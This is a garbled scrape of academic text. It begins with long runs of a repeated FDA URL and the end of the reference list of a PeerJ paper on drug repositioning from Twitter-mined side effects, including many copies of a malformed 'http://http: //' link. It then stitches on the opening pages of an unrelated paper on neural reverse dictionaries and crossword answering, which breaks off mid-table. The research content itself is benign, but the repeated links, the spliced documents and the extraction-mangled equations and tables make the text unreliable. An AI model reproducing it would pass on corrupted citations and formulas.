http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://dx.doi.org/10.1371/journal.pcbi.1000641 http://dx.doi.org/10.1038/nprot.2014.151 http://dx.doi.org/10.1002/cpt.82 http://dx.doi.org/10.7717/peerj-cs.46 Wang ZY, Zhang HY. 2013. Rational drug repositioning by medical genetics. Nature Biotechnology 31(12):1080–1082 DOI 10.1038/nbt.2758. Wang F, Zhang P, Cao N, Hu J, Sorrentino R. 2014. Exploring the associations between drug side-effects and therapeutic indications. Journal of Biomedical Informatics 51:15–23 DOI 10.1016/j.jbi.2014.03.014. Wheater G, Hogan VE, Teng YKO, Tekstra J, Lafeber FP, Huizinga TWJ, Bijlsma JWJ, Francis RM, Tuck SP, Datta HK, Van Laar JM. 2011. Suppression of bone turnover by B-cell depletion in patients with rheumatoid arthritis. Osteoporosis International 22(12):3067–3072 DOI 10.1007/s00198-011-1607-0. Wu Y-H, Ursinus J, Zhou J-N, Scheer FAJL, Ai-Min B, Jockers R, van Heerikhuize J, Swaab DF. 2013. Alterations of melatonin receptors MT1 and MT2 in the hypothalamic suprachiasmatic nucleus during depression. Journal of Affective Disorders 148(2–3):357–367 DOI 10.1016/j.jad.2012.12.025. Xie L, Kinnings S, Xie L, Bourne P. 2012. Predicting the polypharmacology of drugs: identifying new uses through chemoinformatics, structural informatics, and molecular modeling-based approaches. In: Barratt M, Frai D, eds. Drug repositioning: bringing new life to shelved assets and existing drugs. Hoboken: John Wiley & Sons. Yang L, Agarwal P. 2011. Systematic drug repositioning based on clinical side-effects. PLoS ONE 6(12):e28025 DOI 10.1371/journal.pone.0028025. Ye H, Liu Q, Wei J. 2014. Construction of drug network based on side effects and its application for drug repositioning. PLoS ONE 9(2):e87864 DOI 10.1371/journal.pone.0087864. Zeng QT, Crowell J, Divita G, Roth L, Browne AC. 2005. Identifying consumer-friendly display (CFD) names for health concepts. In: AMIA annual symposium proceedings, 859–863. Available at http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/. Zhang J, Jiang K, Lv L, Wang H, Shen Z, Gao Z, Wang B, Yang Y, Ye Y, Wang S. 2015. Use of genome-wide association studies for cancer research and drug repositioning. PLoS ONE 10(3):e0116477 DOI 10.1371/journal.pone.0116477. Zhang P, Wang F, Hu J, Sorrentino R. 2013. Exploring the relationship between drug side-effects and therapeutic indications. AMIA Annual Symposium Proceedings 2013:1568–1577. Nugent et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.46 24/24 https://peerj.com/computer-science/ http://dx.doi.org/10.1038/nbt.2758 http://dx.doi.org/10.1016/j.jbi.2014.03.014 http://dx.doi.org/10.1007/s00198-011-1607-0 http://dx.doi.org/10.1016/j.jad.2012.12.025 http://dx.doi.org/10.1371/journal.pone.0028025 http://dx.doi.org/10.1371/journal.pone.0087864 http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://http: //www.ncbi.nlm.nih.gov/pmc/articles/PMC1560732/ http://dx.doi.org/10.1371/journal.pone.0116477 http://dx.doi.org/10.7717/peerj-cs.46 Computational drug repositioning based on side-effects mined from social media Introduction Methods Mining Twitter for drug side-effects Twitter data Calculating the sample covariance matrix Shrinkage estimation Graphical lasso for sparse inverse covariance estimation Results and Discussion Recovering known indications Predicting proposed indications of compounds currently in clinical trials Conclusions Acknowledgements References work_pomvj2ifwrbwjdcmiw5ube5dge ---- Learning to Understand Phrases by Embedding the Dictionary Felix Hill Computer Laboratory University of Cambridge felix.hill@cl.cam.ac.uk Kyunghyun Cho∗ Courant Institute of Mathematical Sciences and Centre for Data Science New York University kyunghyun.cho@nyu.edu Anna Korhonen Department of Theoretical and Applied Linguistics University of Cambridge alk23@cam.ac.uk Yoshua Bengio CIFAR Senior Fellow Université de Montréal yoshua.bengio@umontreal.ca Abstract Distributional models that learn rich seman- tic word representations are a success story of recent NLP research. However, develop- ing models that learn useful representations of phrases and sentences has proved far harder. We propose using the definitions found in everyday dictionaries as a means of bridg- ing this gap between lexical and phrasal se- mantics. Neural language embedding mod- els can be effectively trained to map dictio- nary definitions (phrases) to (lexical) repre- sentations of the words defined by those defi- nitions. We present two applications of these architectures: reverse dictionaries that return the name of a concept given a definition or description and general-knowledge crossword question answerers. On both tasks, neural lan- guage embedding models trained on defini- tions from a handful of freely-available lex- ical resources perform as well or better than existing commercial systems that rely on sig- nificant task-specific engineering. The re- sults highlight the effectiveness of both neu- ral embedding architectures and definition- based training for developing models that un- derstand phrases and sentences. 1 Introduction Much recent research in computational seman- tics has focussed on learning representations of arbitrary-length phrases and sentences. This task is challenging partly because there is no obvious gold standard of phrasal representation that could be used ∗ Work mainly done at the University of Montreal. in training and evaluation. Consequently, it is diffi- cult to design approaches that could learn from such a gold standard, and also hard to evaluate or compare different models. In this work, we use dictionary definitions to ad- dress this issue. The composed meaning of the words in a dictionary definition (a tall, long-necked, spotted ruminant of Africa) should correspond to the meaning of the word they define (giraffe). This bridge between lexical and phrasal semantics is use- ful because high quality vector representations of single words can be used as a target when learning to combine the words into a coherent phrasal repre- sentation. This approach still requires a model capable of learning to map between arbitrary-length phrases and fixed-length continuous-valued word vectors. For this purpose we experiment with two broad classes of neural language models (NLMs): Recur- rent Neural Networks (RNNs), which naturally en- code the order of input words, and simpler (feed- forward) bag-of-words (BOW) embedding models. Prior to training these NLMs, we learn target lexi- cal representations by training the Word2Vec soft- ware (Mikolov et al., 2013) on billions of words of raw text. We demonstrate the usefulness of our approach by building and releasing two applications. The first is a reverse dictionary or concept finder: a system that returns words based on user descriptions or defini- tions (Zock and Bilac, 2004). Reverse dictionaries are used by copywriters, novelists, translators and other professional writers to find words for notions or ideas that might be on the tip of their tongue. 17 Transactions of the Association for Computational Linguistics, vol. 4, pp. 17–30, 2016. Action Editor: Chris Callison-Burch. Submission batch: 9/2015; revised 12/2015; revised 1/2016; Published 2/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. For instance, a travel-writer might look to enhance her prose by searching for examples of a country that people associate with warm weather or an ac- tivity that is mentally or physically demanding. We show that an NLM-based reverse dictionary trained on only a handful of dictionaries identifies novel def- initions and concept descriptions comparably or bet- ter than commercial systems, which rely on signif- icant task-specific engineering and access to much more dictionary data. Moreover, by exploiting mod- els that learn bilingual word representations (Vulic et al., 2011; Klementiev et al., 2012; Hermann and Blunsom, 2013; Gouws et al., 2014), we show that the NLM approach can be easily extended to pro- duce a potentially useful cross-lingual reverse dic- tionary. The second application of our models is as a general-knowledge crossword question answerer. When trained on both dictionary definitions and the opening sentences of Wikipedia articles, NLMs pro- duce plausible answers to (non-cryptic) crossword clues, even those that apparently require detailed world knowledge. Both BOW and RNN models can outperform bespoke commercial crossword solvers, particularly when clues contain a greater number of words. Qualitative analysis reveals that NLMs can learn to relate concepts that are not directly con- nected in the training data and can thus generalise well to unseen input. To facilitate further research, all of our code, training and evaluation sets (together with a system demo) are published online with this paper.1 2 Neural Language Model Architectures The first model we apply to the dictionary-based learning task is a recurrent neural network (RNN). RNNs operate on variable-length sequences of in- puts; in our case, natural language definitions, de- scriptions or sentences. RNNs (with LSTMs) have achieved state-of-the-art performance in language modelling (Mikolov et al., 2010), image caption generation (Kiros et al., 2015) and approach state- of-the-art performance in machine translation (Bah- danau et al., 2015). During training, the input to the RNN is a dic- tionary definition or sentence from an encyclopedia. 1 https://www.cl.cam.ac.uk/˜fh295/ The objective of the model is to map these defin- ing phrases or sentences to an embedding of the word that the definition defines. The target word embeddings are learned independently of the RNN weights, using the Word2Vec software (Mikolov et al., 2013). The set of all words in the training data consti- tutes the vocabulary of the RNN. For each word in this vocabulary we randomly initialise a real-valued vector (input embedding) of model parameters. The RNN ‘reads’ the first word in the input by applying a non-linear projection of its embedding v1 parame- terised by input weight matrix W and b, a vector of biases. A1 = φ(Wv1 + b) yielding the first internal activation state A1. In our implementation, we use φ(x) = tanh(x), though in theory φ can be any differentiable non-linear func- tion. Subsequent internal activations (after time-step t) are computed by projecting the embedding of the tth word and using this information to ‘update’ the internal activation state. At = φ(UAt−1 + Wvt + b). As such, the values of the final internal activation state units AN are a weighted function of all input word embeddings, and constitute a ‘summary’ of the information in the sentence. 2.1 Long Short Term Memory A known limitation when training RNNs to read lan- guage using gradient descent is that the error sig- nal (gradient) on the training examples either van- ishes or explodes as the number of time steps (sen- tence length) increases (Bengio et al., 1994). Conse- quently, after reading longer sentences the final in- ternal activation AN typically retains useful infor- mation about the most recently read (sentence-final) words, but can neglect important information near the start of the input sentence. LSTMs (Hochreiter and Schmidhuber, 1997) were designed to mitigate this long-term dependency problem. At each time step t, in place of the single inter- nal layer of units A, the LSTM RNN computes six internal layers iw,gi,gf,go,h and m. The first, gw, represents the core information passed to the LSTM 18 https://www.cl.cam.ac.uk/~fh295/ unit by the latest input word at t. It is computed as a simple linear projection of the input embedding vt (by input weights Ww) and the output state of the LSTM at the previous time step ht−1 (by update weights Uw): iwt = Wwvt + Uwht−1 + bw The layers gi,gf and go are computed as weighted sigmoid functions of the input embeddings, again parameterised by layer-specific weight matrices W and U: gst = 1 1 + exp(−(Wsvt + Usht−1 + bs)) where s stands for one of i,f or o. These vectors take values on [0,1] and are often referred to as gat- ing activations. Finally, the internal memory state, mt and new output state ht, of the LSTM at t are computed as mt =i w t �git + mt−1 �g f t ht =g o t �φ(mt), where � indicates elementwise vector multiplica- tion and φ is, as before, some non-linear function (we use tanh). Thus, gi determines to what extent the new input word is considered at each time step, gf determines to what extent the existing state of the internal memory is retained or forgotten in com- puting the new internal memory, and go determines how much this memory is considered when comput- ing the output state at t. The sentence-final memory state of the LSTM, mN , a ‘summary’ of all the information in the sen- tence, is then projected via an extra non-linear pro- jection (parameterised by a further weight matrix) to a target embedding space. This layer enables the target (defined) word embedding space to take a dif- ferent dimension to the activation layers of the RNN, and in principle enables a more complex definition- reading function to be learned. 2.2 Bag-of-Words NLMs We implement a simpler linear bag-of-words (BOW) architecture for encoding the definition phrases. As with the RNN, this architecture learns an embedding vi for each word in the model vocabulary, together with a single matrix of input projection weights W . The BOW model simply maps an input definition with word embeddings v1 . . .vn to the sum of the projected embeddings ∑n i=1 Wvi. This model can also be considered a special case of an RNN in which the update function U and nonlinearity φ are both the identity, so that ‘reading’ the next word in the input phrase updates the current representation more simply: At = At−1 + Wvt. 2.3 Pre-trained Input Representations We experiment with variants of these models in which the input definition embeddings are pre- learned and fixed (rather than randomly-initialised and updated) during training. There are several po- tential advantages to taking this approach. First, the word embeddings are trained on massive corpora and may therefore introduce additional linguistic or conceptual knowledge to the models. Second, at test time, the models will have a larger effective vocab- ulary, since the pre-trained word embeddings typi- cally span a larger vocabulary than the union of all dictionary definitions used to train the model. Fi- nally, the models will then map to and from the same space of embeddings (the embedding space will be closed under the operation of the model), so con- ceivably could be more easily applied as a general- purpose ‘composition engine’. 2.4 Training Objective We train all neural language models M to map the input definition phrase sc defining word c to a lo- cation close to the the pre-trained embedding vc of c. We experiment with two different cost functions for the word-phrase pair (c,sc) from the training data. The first is simply the cosine distance between M(sc) and vc. The second is the rank loss max(0,m− cos(M(sc),vc)−cos(M(sc),vr)) where vr is the embedding of a randomly-selected word from the vocabulary other than c. This loss function was used for language models, for example, in (Huang et al., 2012). In all experiments we apply a margin m = 0.1, which has been shown to work well on word-retrieval tasks (Bordes et al., 2015). 19 2.5 Implementation Details Since training on the dictionary data took 6-10 hours, we did not conduct a hyper-parameter search on any validation sets over the space of possible model configurations such as embedding dimension, or size of hidden layers. Instead, we chose these parameters to be as standard as possible based on previous research. For fair comparison, any aspects of model design that are not specific to a particu- lar class of model were kept constant across experi- ments. The pre-trained word embeddings used in all of our models (either as input or target) were learned by a continuous bag-of-words (CBOW) model using the Word2Vec software on approximately 8 billion words of running text.2 When training such models on massive corpora, a large embedding length of up to 700 have been shown to yield best performance (see e.g. (Faruqui et al., 2014)). The pre-trained em- beddings used in our models were of length 500, as a compromise between quality and memory con- straints. In cases where the word embeddings are learned during training on the dictionary objective, we make these embeddings shorter (256), since they must be learned from much less language data. In the RNN models, and at each time step each of the four LSTM RNN internal layers (gating and activa- tion states) had length 512 – another standard choice (see e.g. (Cho et al., 2014)). The final hidden state was mapped linearly to length 500, the dimension of the target embedding. In the BOW models, the projection matrix projects input embeddings (either learned, of length 256, or pre-trained, of length 500) to length 500 for summing. All models were implemented with Theano (Bergstra et al., 2010) and trained with minibatch SGD on GPUs. The batch size was fixed at 16 and the learning rate was controlled by adadelta (Zeiler, 2012). 2The Word2Vec embedding models are well known; further details can be found at https://code.google.com/p/ word2vec/ The training data for this pre-training was com- piled from various online text sources using the script demo- train-big-model-v1.sh from the same page. 3 Reverse Dictionaries The most immediate application of our trained mod- els is as a reverse dictionary or concept finder. It is simple to look up a definition in a dictionary given a word, but professional writers often also re- quire suitable words for a given idea, concept or definition.3 Reverse dictionaries satisfy this need by returning candidate words given a phrase, de- scription or definition. For instance, when queried with the phrase an activity that requires strength and determination, the OneLook.com reverse dictio- nary returns the concepts exercise and work. Our trained RNN model can perform a similar func- tion, simply by mapping a phrase to a point in the target (Word2Vec) embedding space, and returning the words corresponding to the embeddings that are closest to that point. Several other academic studies have proposed reverse dictionary models. These generally rely on common techniques from information retrieval, comparing definitions in their internal database to the input query, and returning the word whose def- inition is ‘closest’ to that query (Bilac et al., 2003; Bilac et al., 2004; Zock and Bilac, 2004). Proxim- ity is quantified differently in each case, but is gen- erally a function of hand-engineered features of the two sentences. For instance, Shaw et al. (2013) pro- pose a method in which the candidates for a given input query are all words in the model’s database whose definitions contain one or more words from the query. This candidate list is then ranked accord- ing to a query-definition similarity metric based on the hypernym and hyponym relations in WordNet, features commonly used in IR such as tf-idf and a parser. There are, in addition, at least two commercial online reverse dictionary applications, whose ar- chitecture is proprietary knowledge. The first is the Dictionary.com reverse dictionary 4, which re- trieves candidate words from the Dictionary.com dictionary based on user definitions or descrip- tions. The second is OneLook.com, whose algo- rithm searches 1061 indexed dictionaries, including 3See the testimony from professional writers at http:// www.onelook.com/?c=awards 4Available at http://dictionary.reference. com/reverse/ 20 https://code.google.com/p/word2vec/ https://code.google.com/p/word2vec/ http://www.onelook.com/?c=awards http://www.onelook.com/?c=awards http://dictionary.reference.com/reverse/ http://dictionary.reference.com/reverse/ all major freely-available online dictionaries and re- sources such as Wikipedia and WordNet. 3.1 Data Collection and Training To compile a bank of dictionary definitions for train- ing the model, we started with all words in the tar- get embedding space. For each of these words, we extracted dictionary-style definitions from five elec- tronic resources: Wordnet, The American Heritage Dictionary, The Collaborative International Dictio- nary of English, Wiktionary and Webster’s. We chose these five dictionaries because they are freely- available via the WordNik API,5 but in theory any dictionary could be chosen. Most words in our train- ing data had multiple definitions. For each word w with definitions {d1 . . .dn} we included all pairs (w,d1) . . .(w,dn) as training examples. To allow models access to more factual knowl- edge than might be present in a dictionary (for in- stance, information about specific entities, places or people, we supplemented this training data with in- formation extracted from Simple Wikipedia. 6 For every word in the model’s target embedding space that is also the title of a Wikipedia article, we treat the sentences in the first paragraph of the article as if they were (independent) definitions of that word. When a word in Wikipedia also occurs in one (or more) of the five training dictionaries, we simply add these pseudo-definitions to the training set of definitions for the word. Combining Wikipedia and dictionaries in this way resulted in ≈ 900,000 word- ’definition’ pairs of ≈ 100,000 unique words. To explore the effect of the quantity of training data on the performance of the models, we also trained models on subsets of this data. The first sub- set comprised only definitions from Wordnet (ap- proximately 150,000 definitions of 75,000 words). The second subset comprised only words in Word- net and their first definitions (approximately 75,000 word, definition pairs).7. For all variants of RNN and BOW models, however, reducing the training data in this way resulted in a clear reduction in per- 5See http://developer.wordnik.com 6https://simple.wikipedia.org/wiki/Main_ Page 7As with other dictionaries, the first definition in WordNet generally corresponds to the most typical or common sense of a word. formance on all tasks. For brevity, we therefore do not present these results in what follows. 3.2 Comparisons As a baseline, we also implemented two entirely unsupervised methods using the neural (Word2Vec) word embeddings from the target word space. In the first (W2V add), we compose the embeddings for each word in the input query by pointwise addition, and return as candidates the nearest word embed- dings to the resulting composed vector.8 The sec- ond baseline, (W2V mult), is identical except that the embeddings are composed by elementwise mul- tiplication. Both methods are established ways of building phrase representations from word embed- dings (Mitchell and Lapata, 2010). None of the models or evaluations from previous academic research on reverse dictionaries is pub- licly available, so direct comparison is not possi- ble. However, we do compare performance with the commercial systems. The Dictionary.com sys- tem returned no candidates for over 96% of our in- put definitions. We therefore conduct detailed com- parison with OneLook.com, which is the first re- verse dictionary tool returned by a Google search and seems to be the most popular among writers. 3.3 Reverse Dictionary Evaluation To our knowledge there are no established means of measuring reverse dictionary performance. In the only previous academic research on English reverse dictionaries that we are aware of, evaluation was conducted on 300 word-definition pairs written by lexicographers (Shaw et al., 2013). Since these are not publicly available we developed new evaluation sets and make them freely available for future eval- uations. The evaluation items are of three types, designed to test different properties of the models. To cre- ate the seen evaluation, we randomly selected 500 words from the WordNet training data (seen by all models), and then randomly selected a definition for each word. Testing models on the resulting 500 word-definition pairs assesses their ability to recall or decode previously encoded information. For the 8Since we retrieve all answers from embedding spaces by cosine similarity, addition of word embeddings is equivalent to taking the mean. 21 http://developer.wordnik.com https://simple.wikipedia.org/wiki/Main_Page https://simple.wikipedia.org/wiki/Main_Page Dictionary definitions Test Set Seen (500 WN defs) Unseen (500 WN defs) Concept descriptions (200) Unsup. W2V add - - - 923 .04/.16 163 339 .07/.30 150 models W2V mult - - - 1000 .00/.00 10* 1000 .00/.00 27* OneLook 0 .89/.91 67 - - - 18.5 .38/.58 153 RNN cosine 12 .48/.73 103 22 .41/.70 116 69 .28/.54 157 RNN w2v cosine 19 .44/.70 111 19 .44/.69 126 26 .38/.66 111 RNN ranking 18 .45/.67 128 24 .43/.69 103 25 .34/.66 102 NLMs RNN w2v ranking 54 .32/.56 155 33 .36/.65 137 30 .33/.69 77 BOW cosine 22 .44/.65 129 19 .43/.69 103 50 .34/.60 99 BOW w2v cosine 15 .46/.71 124 14 .46/ .71 104 28 .36/.66 99 BOW ranking 17 .45/.68 115 22 .42/.70 95 32 .35/.69 101 BOW w2v rankng 55 .32/.56 155 36 .35/.66 138 38 .33/.72 85 median rank accuracy@10/100 rank variance Table 1: Performance of different reverse dictionary models in different evaluation settings. *Low variance in mult models is due to consistently poor scores, so not highlighted. unseen evaluation, we randomly selected 500 words from WordNet and excluded all definitions of these words from the training data of all models. Finally, for a fair comparison with OneLook, which has both the seen and unseen pairs in its in- ternal database, we built a new dataset of concept descriptions that do not appear in the training data for any model. To do so, we randomly selected 200 adjectives, nouns or verbs from among the top 3000 most frequent tokens in the British National Cor- pus (Leech et al., 1994) (but outside the top 100). We then asked ten native English speakers to write a single-sentence ‘description’ of these words. To ensure the resulting descriptions were good qual- ity, for each description we asked two participants who did not produce that description to list any words that fitted the description (up to a maximum of three). If the target word was not produced by one of the two checkers, the original participant was asked to re-write the description until the validation was passed.9 These concept descriptions, together with other evaluation sets, can be downloaded from our website for future comparisons. Given a test description, definition, or question, all models produce a ranking of possible word an- swers based on the proximity of their representations of the input phrase and all possible output words. To quantify the quality of a given ranking, we re- port three statistics: the median rank of the correct 9Re-writing was required in 6 of the 200 cases. Test set Word Description Dictionary valve ”control consisting of a mechanical definition device for controlling fluid flow” Concept prefer ”when you like one thing description more than another thing” Table 2: Style difference between dictionary definitions and concept descriptions in the evaluation. answer (over the whole test set, lower better), the proportion of training cases in which the correct an- swer appears in the top 10/100 in this ranking (accu- racy@10/100 - higher better) and the variance of the rank of the correct answer across the test set (rank variance - lower better). 3.4 Results Table 1 shows the performance of the different mod- els in the three evaluation settings. Of the unsu- pervised composition models, elementwise addition is clearly more effective than multiplication, which almost never returns the correct word as the near- est neighbour of the composition. Overall, however, the supervised models (RNN, BOW and OneLook) clearly outperform these baselines. The results indicate interesting differences be- tween the NLMs and the OneLook dictionary search engine. The Seen (WN first) definitions in Table 1 occur in both the training data for the NLMs and the lookup data for the OneLook model. Clearly the OneLook algorithm is better than NLMs at retriev- 22 ing already available information (returning 89% of correct words among the top-ten candidates on this set). However, this is likely to come at the cost of a greater memory footprint, since the model requires access to its database of dictionaries at query time.10 The performance of the NLM embedding models on the (unseen) concept descriptions task shows that these models can generalise well to novel, unseen queries. While the median rank for OneLook on this evaluation is lower, the NLMs retrieve the cor- rect answer in the top ten candidates approximately as frequently, within the top 100 candidates more frequently and with lower variance in ranking over the test set. Thus, NLMs seem to generalise more ‘consistenly’ than OneLook on this dataset, in that they generally assign a reasonably high ranking to the correct word. In contrast, as can also be verified by querying our we demo, OneLook tends to per- form either very well or poorly on a given query.11 When comparing between NLMs, perhaps the most striking observation is that the RNN models do not significantly outperform the BOW models, even though the BOW model output is invariant to changes in the order of words in the definition. Users of the online demo can verify that the BOW models recover concepts from descriptions strikingly well, even when the words in the description are per- muted. This observation underlines the importance of lexical semantics in the interpretation of language by NLMs, and is consistent with some other recent work on embedding sentences (Iyyer et al., 2015). It is difficult to observe clear trends in the dif- ferences between NLMs that learn input word em- beddings and those with pre-trained (Word2Vec) in- put embeddings. Both types of input yield good performance in some situations and weaker perfor- mance in others. In general, pre-training input em- beddings seems to help most on the concept de- scriptions, which are furthest from the training data in terms of linguistic style. This is perhaps unsur- prising, since models that learn input embeddings from the dictionary data acquire all of their concep- 10The trained neural language models are approximately half the size of the six training dictionaries stored as plain text, so would be hundreds of times smaller than the OneLook database of 1061 dictionaries if stored this way. 11We also observed that the mean ranking for NLMs was lower than for OneLook on the concept descriptions task. tual knowledge from this data (and thus may over- fit to this setting), whereas models with pre-trained embeddings have some semantic memory acquired from general running-text language data and other knowledge acquired from the dictionaries. 3.5 Qualitative Analysis Some example output from the various models is presented in Table 3. The differences illustrated here are also evident from querying the web demo. The first example shows how the NLMs (BOW and RNN) generalise beyond their training data. Four of the top five responses could be classed as ap- propriate in that they refer to inhabitants of cold countries. However, inspecting the WordNik train- ing data, there is no mention of cold or anything to do with climate in the definitions of Eskimo, Scandi- navian, Scandinavia etc. Therefore, the embedding models must have learned that coldness is a char- acteristic of Scandinavia, Siberia, Russia, relates to Eskimos etc. via connections with other concepts that are described or defined as cold. In contrast, the candidates produced by the OneLook and (unsu- pervised) W2V baseline models have nothing to do with coldness. The second example demonstrates how the NLMs generally return candidates whose linguistic or con- ceptual function is appropriate to the query. For a query referring explicitly to a means, method or pro- cess, the RNN and BOW models produce verbs in different forms or an appropriate deverbal noun. In contrast, OneLook returns words of all types (aero- dynamics, draught) that are arbitrarily related to the words in the query. A similar effect is apparent in the third example. While the candidates produced by the OneLook model are the correct part of speech (Noun), and related to the query topic, they are not semantically appropriate. The dictionary embedding models are the only ones that return a list of plausi- ble habits, the class of noun requested by the input. 3.6 Cross-Lingual Reverse Dictionaries We now show how the RNN architecture can be eas- ily modified to create a bilingual reverse dictionary - a system that returns candidate words in one lan- guage given a description or definition in another. A bilingual reverse dictionary could have clear ap- plications for translators or transcribers. Indeed, the 23 Input Description OneLook W2V add RNN BOW ”a native of 1:country 2:citizen 1:a 2.the 1:eskimo 2:scandinavian 1:frigid 2:cold a cold 3:foreign 4:naturalize 3:another 4:of 3:arctic 4:indian 3:icy 4:russian country” 5:cisco 5:whole 5:siberian 5:indian ”a way of 1:drag 2:whiz 1:the 2:through 1:glide 2:scooting 1:flying 2:gliding moving 3:aerodynamics 4:draught 3:a 4:moving 3:glides 4:gliding 3:glide 4:fly through 5:coefficient of drag 5:in 5:flight 5:scooting the air” ”a habit that 1:sisterinlaw 2:fatherinlaw 1:annoy 2:your 1:bossiness 2:jealousy 1:infidelity 2:bossiness might annoy 3:motherinlaw 